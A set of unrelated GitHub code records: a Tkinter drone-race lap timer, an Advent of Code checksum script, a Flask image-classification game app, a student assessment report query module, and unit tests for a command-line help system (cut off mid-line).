PIL libraries and display it in a Label widget\r\n img_url = \"https://i.ibb.co/3mMYs96/69.png\"\r\n img_bytes = requests.get(img_url).content\r\n img = Image.open(io.BytesIO(img_bytes))\r\n img = img.resize((300, 200), Image.ANTIALIAS)\r\n photo = ImageTk.PhotoImage(img)\r\n label = Label(self.lap_time_display_window, image=photo)\r\n label.image = photo\r\n label.pack()\r\n \r\n scrollbar = Scrollbar(self.lap_time_display_window)\r\n scrollbar.pack(side=\"right\", fill=\"y\")\r\n self.lap_time_listbox = Listbox(self.lap_time_display_window, yscrollcommand=scrollbar.set)\r\n self.lap_time_listbox.pack(fill=\"both\", expand=True)\r\n scrollbar.config(command=self.lap_time_listbox.yview)\r\n \r\n copy_button = Button(self.lap_time_display_window, text=\"Copy to Clipboard\", command=lambda: self.copy_to_clipboard(lap_times))\r\n copy_button.pack()\r\n # Iterate over the lap times and add each one to the Listbox widget with alternating colors\r\n for i, (racer_name, lap_time) in enumerate(lap_times):\r\n color = \"blue\" if i % 2 == 0 else \"red\"\r\n self.lap_time_listbox.insert(\"end\", f\"{racer_name}: {lap_time}\")\r\n def copy_to_clipboard(self, lap_times):\r\n # Convert the lap times to a string with each lap time on a new line\r\n lap_times_string = \"\"\r\n for i, (racer_name, lap_time) in enumerate(lap_times):\r\n lap_times_string += f\"{racer_name}: {lap_time}\\n\"\r\n \r\n self.root.clipboard_clear()\r\n self.root.clipboard_append(lap_times_string)\r\n def add_racer(self):\r\n if len(self.racer_labels) < 4:\r\n # Add a new racer to the window with a name label and an entry field for their lap time\r\n racer_name_label = Label(self.root, text=\"Racer Name:\")\r\n racer_name_label.pack()\r\n racer_name_entry = Entry(self.root)\r\n racer_name_entry.pack()\r\n self.racer_names.append(\"\")\r\n self.racer_labels.append(racer_name_label)\r\n self.racer_entries.append(racer_name_entry)\r\n \r\n lap_time_label = Label(self.root, text=\"Enter Lap Time:\")\r\n lap_time_label.pack()\r\n lap_time_entry = Entry(self.root)\r\n lap_time_entry.pack()\r\n self.racer_entries.append(lap_time_entry)\r\n\r\nroot = Tk()\r\nroot.title(\"Drone Race Lap Tracker\")\r\nlap_tracker = LapTracker(root)\r\nroot.mainloop()","repo_name":"MasonLWest/FPV-Lap-Timer","sub_path":"FPVLapTrackerFina2l.py","file_name":"FPVLapTrackerFina2l.py","file_ext":"py","file_size_in_byte":7728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72279981928","text":"inFile = open(\"input.txt\")\r\n\r\ncrc = 0\r\n\r\nfor l in inFile.readlines():\r\n inList = l.split('\\t')\r\n inList[-1] = inList[-1].rsplit('\\n')[0]\r\n inList = [ int(x) for x in inList]\r\n crc += max(inList) - min(inList)\r\n\r\nprint(crc)","repo_name":"Flourish3/AdventOfCode","sub_path":"2017/AOC/day2/day2_1.py","file_name":"day2_1.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35628881914","text":"from flask import Flask, render_template, request, url_for\nfrom functions import predict_winner\nfrom tensorflow.keras.models import model_from_json\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\nimport numpy as np\nimport os\nfrom werkzeug.utils import secure_filename\n\nUPLOAD_FOLDER = 'static/uploaded_images'\nALLOWED_EXTENSIONS = set(['png','jpg','jpeg','tiff'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('home.html')\n\n@app.route('/play')\n@app.route('/play', methods=['POST'])\n# Post method to run prediction model and return what each person/comp chose and who won\ndef play():\n try:\n model\n except:\n with open('model.json', 'r') as f:\n model = model_from_json(f.read())\n\n # Load in the model weights\n model.load_weights('20_epochs.h5')\n\n # Compile the model\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n if(request.method == 'POST'):\n if 'file' not in request.files:\n return render_template('play.html', predict=None)\n file = request.files['file']\n if file.filename == '':\n return render_template('play.html', predict=None)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n user_image = load_img(str(app.config['UPLOAD_FOLDER'] + '/' + filename), target_size = (150,150))\n user_image = img_to_array(user_image)\n user_image = np.expand_dims(user_image, axis = 0)\n \n os.remove(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n return render_template('play.html', predict=predict_winner(user_image, model))\n \n \n \n else:\n return render_template('play.html', predict=None)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\nif __name__ == '__main__':\n app.run()","repo_name":"Jordan-Ireland/CNN","sub_path":"flask_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33517869443","text":"# (c) 2014 The Regents of the University of California. All rights reserved,\n# subject to the license below.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by\n# applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\n'''\nCreated on Jan 13, 2013\n\n@author: tosako\n'''\nfrom string import capwords\nfrom sqlalchemy.sql.expression import and_, or_, null\nfrom edapi.decorators import report_config, user_info\nfrom smarter.reports.helpers.name_formatter import format_full_name\nfrom edapi.exceptions import NotFoundException\nfrom edapi.logging import audit_event\nfrom smarter.reports.helpers.breadcrumbs import get_breadcrumbs_context\nfrom smarter.reports.helpers.assessments import get_cut_points, \\\n get_overall_asmt_interval, get_claims, get_accommodations\nfrom smarter.security.context import select_with_context,\\\n get_current_request_context\nfrom smarter.reports.helpers.constants import Constants\nfrom smarter.reports.helpers.constants import AssessmentType\nfrom smarter.reports.helpers.metadata import get_custom_metadata, \\\n get_subjects_map\nfrom edcore.database.edcore_connector import EdCoreDBConnection\nfrom smarter.reports.student_administration import get_asmt_administration_years_isr\nfrom smarter.security.tenant import validate_user_tenant\nfrom smarter_common.security.constants import RolesConstants\nimport logging\nfrom sqlalchemy.sql.functions import func\n\n\nlogger = logging.getLogger('smarter')\n\n\nREPORT_NAME = 'individual_student_report'\n\n\ndef __prepare_query(connector, params):\n '''\n Returns query for individual student report\n '''\n assessment_guid = params.get(Constants.ASSESSMENTGUID)\n student_id = params.get(Constants.STUDENTGUID)\n state_code = params.get(Constants.STATECODE)\n date_taken = params.get(Constants.DATETAKEN)\n asmt_type = params.get(Constants.ASMTTYPE)\n asmt_year = params.get(Constants.ASMTYEAR)\n\n fact_asmt_outcome_vw = connector.get_table('fact_asmt_outcome_vw')\n dim_student = connector.get_table('dim_student')\n dim_asmt = connector.get_table('dim_asmt')\n query = select_with_context([\n fact_asmt_outcome_vw.c.student_id,\n dim_student.c.first_name.label('first_name'),\n dim_student.c.middle_name.label('middle_name'),\n dim_student.c.last_name.label('last_name'),\n fact_asmt_outcome_vw.c.enrl_grade.label('grade'),\n fact_asmt_outcome_vw.c.district_id.label('district_id'),\n fact_asmt_outcome_vw.c.school_id.label('school_id'),\n fact_asmt_outcome_vw.c.state_code.label('state_code'),\n fact_asmt_outcome_vw.c.date_taken.label('date_taken'),\n dim_asmt.c.asmt_subject.label('asmt_subject'),\n dim_asmt.c.asmt_period.label('asmt_period'),\n dim_asmt.c.asmt_period_year.label('asmt_period_year'),\n dim_asmt.c.asmt_type.label('asmt_type'),\n dim_asmt.c.asmt_score_min.label('asmt_score_min'),\n dim_asmt.c.asmt_score_max.label('asmt_score_max'),\n dim_asmt.c.asmt_perf_lvl_name_1.label(\"asmt_cut_point_name_1\"),\n dim_asmt.c.asmt_perf_lvl_name_2.label(\"asmt_cut_point_name_2\"),\n dim_asmt.c.asmt_perf_lvl_name_3.label(\"asmt_cut_point_name_3\"),\n dim_asmt.c.asmt_perf_lvl_name_4.label(\"asmt_cut_point_name_4\"),\n dim_asmt.c.asmt_perf_lvl_name_5.label(\"asmt_cut_point_name_5\"),\n dim_asmt.c.asmt_cut_point_1.label(\"asmt_cut_point_1\"),\n dim_asmt.c.asmt_cut_point_2.label(\"asmt_cut_point_2\"),\n dim_asmt.c.asmt_cut_point_3.label(\"asmt_cut_point_3\"),\n dim_asmt.c.asmt_cut_point_4.label(\"asmt_cut_point_4\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_1.label(\"asmt_claim_perf_lvl_name_1\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_2.label(\"asmt_claim_perf_lvl_name_2\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_3.label(\"asmt_claim_perf_lvl_name_3\"),\n fact_asmt_outcome_vw.c.asmt_grade.label('asmt_grade'),\n fact_asmt_outcome_vw.c.asmt_score.label('asmt_score'),\n fact_asmt_outcome_vw.c.asmt_score_range_min.label('asmt_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_score_range_max.label('asmt_score_range_max'),\n fact_asmt_outcome_vw.c.date_taken_day.label('date_taken_day'),\n fact_asmt_outcome_vw.c.date_taken_month.label('date_taken_month'),\n fact_asmt_outcome_vw.c.date_taken_year.label('date_taken_year'),\n fact_asmt_outcome_vw.c.asmt_perf_lvl.label('asmt_perf_lvl'),\n dim_asmt.c.asmt_claim_1_name.label('asmt_claim_1_name'),\n dim_asmt.c.asmt_claim_2_name.label('asmt_claim_2_name'),\n dim_asmt.c.asmt_claim_3_name.label('asmt_claim_3_name'),\n dim_asmt.c.asmt_claim_4_name.label('asmt_claim_4_name'),\n dim_asmt.c.asmt_claim_1_score_min.label('asmt_claim_1_score_min'),\n dim_asmt.c.asmt_claim_2_score_min.label('asmt_claim_2_score_min'),\n dim_asmt.c.asmt_claim_3_score_min.label('asmt_claim_3_score_min'),\n dim_asmt.c.asmt_claim_4_score_min.label('asmt_claim_4_score_min'),\n dim_asmt.c.asmt_claim_1_score_max.label('asmt_claim_1_score_max'),\n dim_asmt.c.asmt_claim_2_score_max.label('asmt_claim_2_score_max'),\n dim_asmt.c.asmt_claim_3_score_max.label('asmt_claim_3_score_max'),\n dim_asmt.c.asmt_claim_4_score_max.label('asmt_claim_4_score_max'),\n fact_asmt_outcome_vw.c.asmt_claim_1_score.label('asmt_claim_1_score'),\n fact_asmt_outcome_vw.c.asmt_claim_2_score.label('asmt_claim_2_score'),\n fact_asmt_outcome_vw.c.asmt_claim_3_score.label('asmt_claim_3_score'),\n fact_asmt_outcome_vw.c.asmt_claim_4_score.label('asmt_claim_4_score'),\n fact_asmt_outcome_vw.c.asmt_claim_1_score_range_min.label('asmt_claim_1_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_2_score_range_min.label('asmt_claim_2_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_3_score_range_min.label('asmt_claim_3_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_4_score_range_min.label('asmt_claim_4_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_1_score_range_max.label('asmt_claim_1_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_2_score_range_max.label('asmt_claim_2_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_3_score_range_max.label('asmt_claim_3_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_4_score_range_max.label('asmt_claim_4_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_1_perf_lvl.label('asmt_claim_1_perf_lvl'),\n fact_asmt_outcome_vw.c.asmt_claim_2_perf_lvl.label('asmt_claim_2_perf_lvl'),\n fact_asmt_outcome_vw.c.asmt_claim_3_perf_lvl.label('asmt_claim_3_perf_lvl'),\n fact_asmt_outcome_vw.c.asmt_claim_4_perf_lvl.label('asmt_claim_4_perf_lvl'),\n fact_asmt_outcome_vw.c.acc_asl_video_embed.label('acc_asl_video_embed'),\n fact_asmt_outcome_vw.c.acc_noise_buffer_nonembed.label('acc_noise_buffer_nonembed'),\n fact_asmt_outcome_vw.c.acc_print_on_demand_items_nonembed.label('acc_print_on_demand_items_nonembed'),\n fact_asmt_outcome_vw.c.acc_braile_embed.label('acc_braile_embed'),\n fact_asmt_outcome_vw.c.acc_closed_captioning_embed.label('acc_closed_captioning_embed'),\n fact_asmt_outcome_vw.c.acc_text_to_speech_embed.label('acc_text_to_speech_embed'),\n fact_asmt_outcome_vw.c.acc_abacus_nonembed.label('acc_abacus_nonembed'),\n fact_asmt_outcome_vw.c.acc_alternate_response_options_nonembed.label('acc_alternate_response_options_nonembed'),\n fact_asmt_outcome_vw.c.acc_calculator_nonembed.label('acc_calculator_nonembed'),\n fact_asmt_outcome_vw.c.acc_multiplication_table_nonembed.label('acc_multiplication_table_nonembed'),\n fact_asmt_outcome_vw.c.acc_print_on_demand_nonembed.label('acc_print_on_demand_nonembed'),\n fact_asmt_outcome_vw.c.acc_read_aloud_nonembed.label('acc_read_aloud_nonembed'),\n fact_asmt_outcome_vw.c.acc_scribe_nonembed.label('acc_scribe_nonembed'),\n fact_asmt_outcome_vw.c.acc_speech_to_text_nonembed.label('acc_speech_to_text_nonembed'),\n fact_asmt_outcome_vw.c.acc_streamline_mode.label('acc_streamline_mode'),\n fact_asmt_outcome_vw.c.administration_condition.label('administration_condition'),\n func.coalesce(fact_asmt_outcome_vw.c.complete, True).label('complete')\n ], from_obj=[\n fact_asmt_outcome_vw\n .join(dim_student, and_(fact_asmt_outcome_vw.c.student_rec_id == dim_student.c.student_rec_id))\n .join(dim_asmt, and_(dim_asmt.c.asmt_rec_id == fact_asmt_outcome_vw.c.asmt_rec_id))\n ], permission=RolesConstants.PII, state_code=state_code)\n query = query\\\n .where(\n and_(\n fact_asmt_outcome_vw.c.student_id == student_id,\n fact_asmt_outcome_vw.c.rec_status == Constants.CURRENT))\n query = query\\\n .where(and_(\n or_(and_(fact_asmt_outcome_vw.c.asmt_type.in_([AssessmentType.SUMMATIVE]),\n (or_(fact_asmt_outcome_vw.c.administration_condition == Constants.ADMINISTRATION_CONDITION_INVALID, fact_asmt_outcome_vw.c.administration_condition == null()))),\n and_(fact_asmt_outcome_vw.c.asmt_type.in_([AssessmentType.INTERIM_COMPREHENSIVE])),\n (or_(fact_asmt_outcome_vw.c.administration_condition == null(),\n fact_asmt_outcome_vw.c.administration_condition.in_([Constants.ADMINISTRATION_CONDITION_STANDARDIZED, Constants.ADMINISTRATION_CONDITION_NON_STANDARDIZED]))))))\n\n if assessment_guid is not None:\n query = query.where(dim_asmt.c.asmt_guid == assessment_guid)\n if date_taken is not None:\n query = query.where(fact_asmt_outcome_vw.c.date_taken == str(date_taken))\n if asmt_type is not None:\n query = query.where(dim_asmt.c.asmt_type == asmt_type)\n if asmt_year is not None:\n query = query.where(fact_asmt_outcome_vw.c.asmt_year == asmt_year)\n query = query.order_by(dim_asmt.c.asmt_subject.desc(), dim_asmt.c.asmt_period_year.desc())\n return query\n\n\ndef __prepare_query_iab(connector, params):\n '''\n Returns query for individual student report for IAB\n '''\n assessment_guid = params.get(Constants.ASSESSMENTGUID)\n asmt_year = params.get(Constants.ASMTYEAR)\n student_id = params.get(Constants.STUDENTGUID)\n state_code = params.get(Constants.STATECODE)\n\n fact_block_asmt_outcome = connector.get_table(Constants.FACT_BLOCK_ASMT_OUTCOME)\n dim_student = connector.get_table(Constants.DIM_STUDENT)\n dim_asmt = connector.get_table(Constants.DIM_ASMT)\n query = select_with_context([fact_block_asmt_outcome.c.student_id,\n dim_student.c.first_name.label('first_name'),\n dim_student.c.middle_name.label('middle_name'),\n dim_student.c.last_name.label('last_name'),\n fact_block_asmt_outcome.c.enrl_grade.label('enrl_grade'),\n fact_block_asmt_outcome.c.district_id.label('district_id'),\n fact_block_asmt_outcome.c.school_id.label('school_id'),\n fact_block_asmt_outcome.c.state_code.label('state_code'),\n dim_asmt.c.asmt_subject.label('asmt_subject'),\n dim_asmt.c.asmt_period.label('asmt_period'),\n dim_asmt.c.asmt_period_year.label('asmt_period_year'),\n fact_block_asmt_outcome.c.date_taken.label('date_taken'),\n dim_asmt.c.asmt_type.label('asmt_type'),\n dim_asmt.c.asmt_score_min.label('asmt_score_min'),\n dim_asmt.c.asmt_score_max.label('asmt_score_max'),\n dim_asmt.c.asmt_perf_lvl_name_1.label(\"asmt_cut_point_name_1\"),\n dim_asmt.c.asmt_perf_lvl_name_2.label(\"asmt_cut_point_name_2\"),\n dim_asmt.c.asmt_perf_lvl_name_3.label(\"asmt_cut_point_name_3\"),\n dim_asmt.c.asmt_perf_lvl_name_4.label(\"asmt_cut_point_name_4\"),\n dim_asmt.c.asmt_perf_lvl_name_5.label(\"asmt_cut_point_name_5\"),\n dim_asmt.c.asmt_cut_point_1.label(\"asmt_cut_point_1\"),\n dim_asmt.c.asmt_cut_point_2.label(\"asmt_cut_point_2\"),\n dim_asmt.c.asmt_cut_point_3.label(\"asmt_cut_point_3\"),\n dim_asmt.c.asmt_cut_point_4.label(\"asmt_cut_point_4\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_1.label(\"asmt_claim_perf_lvl_name_1\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_2.label(\"asmt_claim_perf_lvl_name_2\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_3.label(\"asmt_claim_perf_lvl_name_3\"),\n fact_block_asmt_outcome.c.asmt_grade.label('asmt_grade'),\n fact_block_asmt_outcome.c.date_taken_day.label('date_taken_day'),\n fact_block_asmt_outcome.c.date_taken_month.label('date_taken_month'),\n fact_block_asmt_outcome.c.date_taken_year.label('date_taken_year'),\n dim_asmt.c.asmt_claim_1_name.label('asmt_claim_1_name'),\n dim_asmt.c.asmt_claim_2_name.label('asmt_claim_2_name'),\n dim_asmt.c.asmt_claim_3_name.label('asmt_claim_3_name'),\n dim_asmt.c.asmt_claim_4_name.label('asmt_claim_4_name'),\n dim_asmt.c.asmt_claim_1_score_min.label('asmt_claim_1_score_min'),\n dim_asmt.c.asmt_claim_2_score_min.label('asmt_claim_2_score_min'),\n dim_asmt.c.asmt_claim_3_score_min.label('asmt_claim_3_score_min'),\n dim_asmt.c.asmt_claim_4_score_min.label('asmt_claim_4_score_min'),\n dim_asmt.c.asmt_claim_1_score_max.label('asmt_claim_1_score_max'),\n dim_asmt.c.asmt_claim_2_score_max.label('asmt_claim_2_score_max'),\n dim_asmt.c.asmt_claim_3_score_max.label('asmt_claim_3_score_max'),\n dim_asmt.c.asmt_claim_4_score_max.label('asmt_claim_4_score_max'),\n fact_block_asmt_outcome.c.asmt_claim_1_score.label('asmt_claim_1_score'),\n fact_block_asmt_outcome.c.asmt_claim_1_score_range_min.label('asmt_claim_1_score_range_min'),\n fact_block_asmt_outcome.c.asmt_claim_1_score_range_max.label('asmt_claim_1_score_range_max'),\n fact_block_asmt_outcome.c.asmt_claim_1_perf_lvl.label('asmt_claim_1_perf_lvl'),\n fact_block_asmt_outcome.c.administration_condition.label('administration_condition'),\n func.coalesce(fact_block_asmt_outcome.c.complete, True).label('complete')],\n from_obj=[fact_block_asmt_outcome\n .join(dim_student, and_(fact_block_asmt_outcome.c.student_rec_id == dim_student.c.student_rec_id))\n .join(dim_asmt, and_(dim_asmt.c.asmt_rec_id == fact_block_asmt_outcome.c.asmt_rec_id))], permission=RolesConstants.PII, state_code=state_code)\n query = query.where(and_(fact_block_asmt_outcome.c.student_id == student_id, fact_block_asmt_outcome.c.rec_status == Constants.CURRENT, dim_asmt.c.asmt_type == AssessmentType.INTERIM_ASSESSMENT_BLOCKS))\n query = query.where(and_(or_(fact_block_asmt_outcome.c.administration_condition == null(), fact_block_asmt_outcome.c.administration_condition.in_([Constants.ADMINISTRATION_CONDITION_STANDARDIZED,\n Constants.ADMINISTRATION_CONDITION_NON_STANDARDIZED]))))\n if assessment_guid is not None:\n query = query.where(dim_asmt.c.asmt_guid == assessment_guid)\n if asmt_year is not None:\n query = query.where(fact_block_asmt_outcome.c.asmt_year == asmt_year)\n query = query.order_by(dim_asmt.c.asmt_subject.desc(), fact_block_asmt_outcome.c.asmt_grade.desc(), fact_block_asmt_outcome.c.date_taken.desc())\n return query\n\n\ndef __calculateClaimScoreRelativeDifference(item):\n '''\n calcluate relative difference for each claims\n 1. find absluate max claim score\n 2. calculate relative difference\n '''\n newItem = item.copy()\n asmt_score = newItem['asmt_score']\n claims = newItem['claims']\n maxAbsDiffScore = 0\n for claim in claims:\n score = int(claim['score'])\n # keep track max score difference\n if maxAbsDiffScore < abs(asmt_score - score):\n maxAbsDiffScore = abs(asmt_score - score)\n for claim in claims:\n score = int(claim['score'])\n if maxAbsDiffScore == 0:\n claim['claim_score_relative_difference'] = 0\n else:\n claim['claim_score_relative_difference'] = int((score - asmt_score) / maxAbsDiffScore * 100)\n return newItem\n\n\ndef __arrange_results(results, subjects_map, custom_metadata_map):\n '''\n This method arranges the data retrieved from the db to make it easier to consume by the client\n '''\n new_results = []\n for result in results:\n\n result['student_full_name'] = format_full_name(result['first_name'], result['middle_name'], result['last_name'])\n # asmt_type is an enum, so we would to capitalize it to make it presentable\n result['asmt_type'] = capwords(result['asmt_type'], ' ')\n result['asmt_score_interval'] = get_overall_asmt_interval(result)\n\n # custom metadata\n subject_name = subjects_map[result[\"asmt_subject\"]]\n custom = custom_metadata_map.get(subject_name)\n # format and rearrange cutpoints\n result = get_cut_points(custom, result)\n\n result['claims'] = get_claims(number_of_claims=5, result=result, include_names=True, include_scores=True, include_min_max_scores=True, include_indexer=True)\n result['accommodations'] = get_accommodations(result=result)\n\n new_results.append(result)\n\n # rearranging the json so we could use it more easily with mustache\n for idx, value in enumerate(new_results):\n new_results[idx] = __calculateClaimScoreRelativeDifference(value)\n return {\"all_results\": new_results}\n\n\ndef __arrange_results_iab(results, subjects_map, custom_metadata_map):\n '''\n This method arranges the data retrieved from the db to make it easier to consume by the client\n '''\n iab_results = {}\n if len(results) is 0:\n return iab_results\n first_result = results[0]\n iab_results['student_full_name'] = format_full_name(first_result['first_name'], first_result['middle_name'], first_result['last_name'])\n iab_results['first_name'] = first_result.get('first_name')\n iab_results['middle_name'] = first_result.get('middle_name')\n iab_results['last_name'] = first_result.get('last_name')\n iab_results['asmt_grade'] = first_result.get('asmt_grade')\n iab_results['asmt_type'] = capwords(first_result.get('asmt_type'), ' ')\n iab_results['asmt_period_year'] = first_result.get('asmt_period_year')\n iab_results['student_id'] = first_result.get('student_id')\n\n # Go through each of the different subjects ELA, Math etc.\n subject_data = {}\n for alias in subjects_map.values():\n subject_data[alias] = []\n # Check each DB result against the subject\n for result in results:\n subject_list = {}\n subject = result['asmt_subject']\n subject_list['claims'] = get_claims(number_of_claims=1, result=result, include_names=True, include_scores=False, include_min_max_scores=False, include_indexer=False, include_complete_admin_cond=True)\n subject_list['grade'] = result.get('asmt_grade')\n subject_list['date_taken'] = result.get('date_taken')\n subject_data[subjects_map.get(subject)].append(subject_list)\n # Create map from subject to all value for it's type\n for k, v in subject_data.items():\n iab_results[k] = v\n return {\"all_results\": iab_results}\n\n\n@report_config(name=REPORT_NAME,\n params={\n Constants.STATECODE: {\n \"type\": \"string\",\n \"required\": True,\n \"pattern\": \"^[a-zA-Z]{2}$\"},\n Constants.STUDENTGUID: {\n \"type\": \"string\",\n \"required\": True,\n \"pattern\": \"^[a-zA-Z0-9\\-]{0,50}$\"},\n Constants.ASSESSMENTGUID: {\n \"type\": \"string\",\n \"required\": False,\n \"pattern\": \"^[a-zA-Z0-9\\-]{0,50}$\"},\n Constants.ASMTYEAR: {\n \"type\": \"integer\",\n \"required\": True,\n \"pattern\": \"^[1-9][0-9]{3}$\"},\n Constants.DATETAKEN: {\n \"type\": \"integer\",\n \"required\": False,\n \"pattern\": \"^[1-9]{8}$\"},\n Constants.ASMTTYPE: {\n \"type\": \"string\",\n \"required\": True,\n \"pattern\": \"^(\" + AssessmentType.INTERIM_ASSESSMENT_BLOCKS + \"|\" + AssessmentType.SUMMATIVE + \"|\" + AssessmentType.INTERIM_COMPREHENSIVE + \")$\"}\n })\n@validate_user_tenant\n@user_info\n@get_current_request_context\n@audit_event()\ndef get_student_report(params):\n '''\n Individual Student Report\n '''\n student_id = params[Constants.STUDENTGUID]\n state_code = params[Constants.STATECODE]\n academic_year = params.get(Constants.ASMTYEAR)\n asmt_type = params.get(Constants.ASMTTYPE)\n asmt_type = asmt_type if asmt_type and asmt_type == AssessmentType.INTERIM_ASSESSMENT_BLOCKS else None\n\n with EdCoreDBConnection(state_code=state_code) as connection:\n # choose query IAB or other assessment\n query_function = {AssessmentType.INTERIM_ASSESSMENT_BLOCKS: __prepare_query_iab, None: __prepare_query}\n # choose arrange results for the client IAB or other assessment\n arrange_function = {AssessmentType.INTERIM_ASSESSMENT_BLOCKS: __arrange_results_iab, None: __arrange_results}\n query = query_function[asmt_type](connection, params)\n result = connection.get_result(query)\n if not result:\n logger.error(\"Individual student report: there are no results for student id : %s\", student_id)\n raise NotFoundException(\"There are no results for student id {0}\".format(student_id))\n records = [record for record in result if record['asmt_period_year'] == academic_year]\n first_student = records[0] if len(records) > 0 else result[0]\n state_code = first_student[Constants.STATE_CODE]\n district_id = first_student[Constants.DISTRICT_ID]\n school_id = first_student[Constants.SCHOOL_ID]\n asmt_grade = first_student['asmt_grade']\n student_name = format_full_name(first_student['first_name'], first_student['middle_name'], first_student['last_name'])\n context = get_breadcrumbs_context(state_code=state_code, district_id=district_id, school_id=school_id, asmt_grade=asmt_grade, student_name=student_name)\n student_report_asmt_administration = get_asmt_administration_years_isr(state_code, student_ids=student_id)\n\n # color metadata\n custom_metadata_map = get_custom_metadata(result[0].get(Constants.STATE_CODE), None)\n # subjects map\n subjects_map = get_subjects_map()\n result = arrange_function[asmt_type](result, subjects_map, custom_metadata_map)\n\n result['context'] = context\n result[Constants.METADATA] = {Constants.BRANDING: custom_metadata_map.get(Constants.BRANDING)}\n result[Constants.SUBJECTS] = {v: k for k, v in subjects_map.items()}\n result['asmt_administration'] = student_report_asmt_administration\n return result\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"smarter/smarter/reports/student_report.py","file_name":"student_report.py","file_ext":"py","file_size_in_byte":24626,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"39221250381","text":"import unittest\n\nfrom test.stub_stdout import StubStdout\n\nfrom googkit.commands.command import Command\nfrom googkit.compat.unittest import mock\nfrom googkit.lib.argument import ArgumentParser\nfrom googkit.lib.command_tree import CommandTree\nfrom googkit.lib.help import Help\n\n\nclass TestHelp(unittest.TestCase):\n class OptionCommand(Command):\n @classmethod\n def supported_options(cls):\n return set(['--foo', '--bar'])\n\n class NoOptionCommand(Command):\n @classmethod\n def supported_options(cls):\n return set()\n\n def setUp(self):\n CommandTree.DEFAULT_TREE = {\n '0_leaf': TestHelp.NoOptionCommand,\n '0_node': {\n '1_leaf': TestHelp.OptionCommand,\n '1_node': {\n '2_leaf': mock.MagicMock()\n }\n }\n }\n self.tree = CommandTree()\n\n def help_with_args(self, args):\n arg = ArgumentParser.parse(['googkit.py'] + args)\n return Help(self.tree, arg)\n\n def test_is_valid_commands(self):\n help = self.help_with_args(['0_leaf'])\n self.assertTrue(help._is_valid_commands())\n\n help = self.help_with_args(['0_node', '1_leaf'])\n self.assertTrue(help._is_valid_commands())\n\n help = self.help_with_args(['0_node', '1_leaf', 'bluerose'])\n self.assertFalse(help._is_valid_commands())\n\n def test_print_usage(self):\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertFalse(mock_stdout.getvalue().find('') >= 0)\n\n help = self.help_with_args(['bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertTrue(mock_stdout.getvalue().find('') >= 0)\n\n help = self.help_with_args(['0_leaf', 'bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertFalse(mock_stdout.getvalue().find('') >= 0)\n\n help = self.help_with_args(['0_node'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertTrue(mock_stdout.getvalue().find('') >= 0)\n\n def test_print_available_commands(self):\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout') as mock_stdout:\n help._print_available_commands(None)\n self.assertFalse(mock_stdout.write.called)\n\n help = self.help_with_args(['0_node'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_available_commands(None)\n self.assertTrue(mock_stdout.getvalue().find('Available commands') >= 0)\n\n help = self.help_with_args(['0_node', 'bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_available_commands(None)\n self.assertTrue(mock_stdout.getvalue().find('Did you mean one of these') >= 0)\n\n def test_similarity(self):\n func = Help.similarity('desp')\n self.assertTrue(func('deps') >= func('build'))\n self.assertTrue(func('') == 0)\n\n def test_candidates(self):\n available_commands = ['build', 'compile', 'deps', 'init', 'lint', 'setup']\n result = Help.candidates(available_commands, 'desp')\n self.assertEqual(result[0], 'deps')\n result = Help.candidates(available_commands, 'int')\n self.assertTrue('init' in result)\n self.assertTrue('lint' in result)\n\n def test_print_available_options(self):\n help = self.help_with_args(['0_node', 'bluerose'])\n with mock.patch('sys.stdout') as mock_stdout:\n help._print_available_options()\n self.assertFalse(\n mock_stdout.return_value.write.called,\n 'Non-existent command should not print availabe options')\n\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout') as 